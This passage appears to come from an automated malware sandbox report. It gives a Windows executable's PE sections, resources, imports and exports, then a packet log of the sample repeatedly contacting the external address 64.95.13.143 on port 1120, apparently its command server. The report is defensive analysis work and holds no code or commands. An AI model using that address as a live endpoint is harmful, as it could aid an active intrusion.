IMAGE_DIRECTORY_ENTRY_IMPORT0x98e0000x50c6.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE0xa8d0000x100200.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa1c0000x70b30.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a10000x7a060.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x9a00000x28.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x98f5000x1320.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9940000x914c.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x8b10200x8b1200375a7695d7a014dcd497198eb48daff1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data0x8b30000xbab680xbac008576115677fae01541a8758828a6f879False0.2308975485274431data4.9676295748628565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss0x96e0000x1f0cc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata0x98e0000x50c60x5200a8f85f9f35e1c8e857717f7fdcac1451False0.24471227134146342data4.360232251720157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata0x9940000x914c0x9200c9086741b6c150ce3727b78eeda72390False0.17133989726027396data3.975549279463611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata0x99e0000x9d0x200893e24d9392a63a4bd48cfc340b37cc7False0.26171875data1.9432984069935513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls0x99f0000x3700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata0x9a00000x6d0x2003a09e226e89da21473e0f2289fb020eaFalse0.197265625data1.370336840113611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x9a10000x7a0600x7a200fdb73105589a0ad9d40ae623e4b179e4False0.43909328620777893data6.432756868541645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata0xa1c0000x70b300x70c00ac0dd8c50313df6cc28cac3e8c6627d7False0.49761164426274945data6.507502255985033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0xa8d0000x1002000x10020014a3d9c97ffbaef84a596c5ba9d9fad7False0.3376313521839922data6.47263636951494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
RT_CURSOR0xa8e0a00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
RT_CURSOR0xa8e1d40x134dataEnglishUnited States0.4642857142857143
RT_CURSOR0xa8e3080x134dataEnglishUnited States0.4805194805194805
RT_CURSOR0xa8e43c0x134dataEnglishUnited States0.38311688311688313
RT_CURSOR0xa8e5700x134dataEnglishUnited States0.36038961038961037
RT_CURSOR0xa8e6a40x134dataEnglishUnited States0.4090909090909091
RT_CURSOR0xa8e7d80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
RT_ICON0xa8e90c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 26880.4147121535181237
RT_ICON0xa8f7b40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.476985559566787
RT_ICON0xa9005c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.48554913294797686
RT_ICON0xa905c40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5167012448132781
RT_ICON0xa92b6c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5719981238273921
RT_ICON0xa93c140x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7109929078014184
RT_STRING0xa9407c0x4ecdata0.3595238095238095
RT_STRING0xa945680x7d4data0.3373253493013972
RT_STRING0xa94d3c0x6c8data0.3675115207373272
RT_STRING0xa954040x6ecdata0.3741534988713318
RT_STRING0xa95af00x69cdata0.324468085106383
RT_STRING0xa9618c0x54cdata0.3414454277286136
RT_STRING0xa966d80x888data0.2793040293040293
RT_STRING0xa96f600x518data0.36809815950920244
RT_STRING0xa974780xcb8data0.2976044226044226
RT_STRING0xa981300x5acdata0.3856749311294766
RT_STRING0xa986dc0x690data0.31785714285714284
RT_STRING0xa98d6c0x764data0.2869978858350951
RT_STRING0xa994d00x69cdata0.3321513002364066
RT_STRING0xa99b6c0x4e4data0.3586261980830671
RT_STRING0xa9a0500x528data0.33484848484848484
RT_STRING0xa9a5780x5acdata0.3443526170798898
RT_STRING0xa9ab240x390data0.44298245614035087
RT_STRING0xa9aeb40x3d4data0.4153061224489796
RT_STRING0xa9b2880x53cdata0.3082089552238806
RT_STRING0xa9b7c40x3d0data0.3719262295081967
RT_STRING0xa9bb940x2c0data0.4303977272727273
RT_STRING0xa9be540x124data0.6061643835616438
RT_STRING0xa9bf780x320data0.45125
RT_STRING0xa9c2980x478data0.3758741258741259
RT_STRING0xa9c7100x560data0.35319767441860467
RT_STRING0xa9cc700x508data0.3517080745341615
RT_STRING0xa9d1780x33cdata0.3321256038647343
RT_STRING0xa9d4b40x408data0.40310077519379844
RT_STRING0xa9d8bc0xd8data0.6666666666666666
RT_STRING0xa9d9940xd0data0.6634615384615384
RT_STRING0xa9da640x2f4data0.44576719576719576
RT_STRING0xa9dd580x3e0data0.3780241935483871
RT_STRING0xa9e1380x398data0.3793478260869565
RT_STRING0xa9e4d00x52cdata0.31797583081570996
RT_STRING0xa9e9fc0x210data0.32007575757575757
RT_STRING0xa9ec0c0x460data0.40625
RT_STRING0xa9f06c0x664data0.35146699266503667
RT_STRING0xa9f6d00x4f4data0.35252365930599366
RT_STRING0xa9fbc40x3a0data0.3728448275862069
RT_STRING0xa9ff640x348data0.39166666666666666
RT_STRING0xaa02ac0x3bcdata0.36506276150627615
RT_STRING0xaa06680x410data0.3798076923076923
RT_STRING0xaa0a780xe8data0.5474137931034483
RT_STRING0xaa0b600xc4data0.6275510204081632
RT_STRING0xaa0c240x268data0.48863636363636365
RT_STRING0xaa0e8c0x434data0.3308550185873606
RT_STRING0xaa12c00x360data0.38425925925925924
RT_STRING0xaa16200x2ecdata0.37566844919786097
RT_STRING0xaa190c0x31cdata0.34296482412060303
RT_RCDATA0xaa1c280x627eJPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3EnglishUnited States0.9922265408106608
RT_RCDATA0xaa7ea80x10data1.5
RT_RCDATA0xaa7eb80x40969dataEnglishUnited States0.572966475526643
RT_RCDATA0xae88240x101cdata0.4604752667313288
RT_RCDATA0xae98400x151Delphi compiled form 'TForm1'0.7210682492581603
RT_RCDATA0xae99940x87bDelphi compiled form '\031TfrmFDGUIxFMXAsyncExecute\030frmFDGUIxFMXAsyncExecute\004Left\002'0.43574389682174114
RT_RCDATA0xaea2100xcbcDelphi compiled form 'TfrmFDGUIxFMXOptsBase'0.6263803680981596
RT_RCDATA0xaeaecc0x4c651dataEnglishUnited States0.17103795623703713
RT_RCDATA0xb375200x5580ddataEnglishUnited States0.2652239585861499
RT_GROUP_CURSOR0xb8cd300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
RT_GROUP_CURSOR0xb8cd440x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
RT_GROUP_CURSOR0xb8cd580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
RT_GROUP_CURSOR0xb8cd6c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
RT_GROUP_CURSOR0xb8cd800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
RT_GROUP_CURSOR0xb8cd940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
RT_GROUP_CURSOR0xb8cda80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
RT_GROUP_ICON0xb8cdbc0x5adata0.7
RT_VERSION0xb8ce180x368dataEnglishUnited States0.44954128440366975
DLLImport
oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dllCharNextW, LoadStringW
kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FindResourceW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
user32.dllWINNLSEnableIME, SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateLayeredWindow, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TrackMouseEvent, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxIndirectW, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextLengthW, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AppendMenuW, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dllUnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetCharABCWidthsFloatW, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateFontW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dlllstrlenW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, OutputDebugStringW, MultiByteToWideChar, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetSystemDirectoryW, GetStdHandle, GetLongPathNameW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, ExpandEnvironmentStringsW, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringA, CompareStringW, CloseHandle
advapi32.dllRegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dllSleep
oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
oleaut32.dllGetErrorInfo, SysFreeString
ole32.dllCreateStreamOnHGlobal, ReleaseStgMedium, OleDraw, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
user32.dllEnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dllisxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strncmp, memset, memcpy, memcmp
shell32.dllShellExecuteW, Shell_NotifyIconW, DragQueryFileW
comdlg32.dllPageSetupDlgW, PrintDlgW, GetSaveFileNameW, GetOpenFileNameW
winspool.drvSetPrinterW, OpenPrinterW, GetPrinterW, GetDefaultPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter
winspool.drvGetDefaultPrinterW
winmm.dlltimeGetTime
d3d9.dllDirect3DCreate9
NameOrdinalAddress
TMethodImplementationIntercept30x4a3e00
__dbk_fcall_wrapper20x417dd0
dbkFCallWrapperAddr10xd72f58
Language of compilation systemCountry where language is spokenMap
EnglishUnited States
TimestampSource PortDest PortSource IPDest IP
Sep 24, 2024 17:46:05.518596888 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:05.524440050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:05.524564028 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:05.525175095 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:05.530284882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:06.099664927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:06.161540985 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.275376081 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.280296087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.280455112 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.285444975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.488790989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.529495955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.581373930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.583678007 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.588510990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.588645935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.594696045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.794992924 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.842040062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.927822113 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.928714991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.933581114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.933713913 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.938515902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.949995041 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.955106020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:08.955405951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:08.960325956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.063500881 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.068305016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.068561077 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.073766947 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241128922 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241162062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241178036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241272926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241285086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241318941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.241318941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.241619110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241633892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241652966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241666079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241677046 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.241678953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.241759062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.241759062 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.242434978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.270684004 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.270983934 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.271406889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.326280117 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.327558041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.327577114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.327594042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.327706099 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.333695889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.333769083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.333781958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.333805084 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.333836079 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.333970070 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.333976984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.334007025 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.334206104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.334218979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.334232092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.334346056 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.335108995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335124016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335144997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335158110 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335171938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335196018 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.335196972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.335278034 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.335330009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335423946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335436106 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335453987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.335479021 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.335535049 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.335650921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.336441040 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.336519957 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.336524010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.388741970 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.625961065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.625983000 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.625993013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626137972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626149893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626163006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626202106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626202106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626262903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626276016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626322985 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626336098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626360893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626360893 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626377106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626456022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626466990 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626473904 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626564980 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626807928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626828909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626842022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626853943 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626867056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626873970 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626873970 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626880884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626893997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626912117 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626914978 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:09.626924992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:09.626955032 CEST497301120192.168.2.464.95.13.143
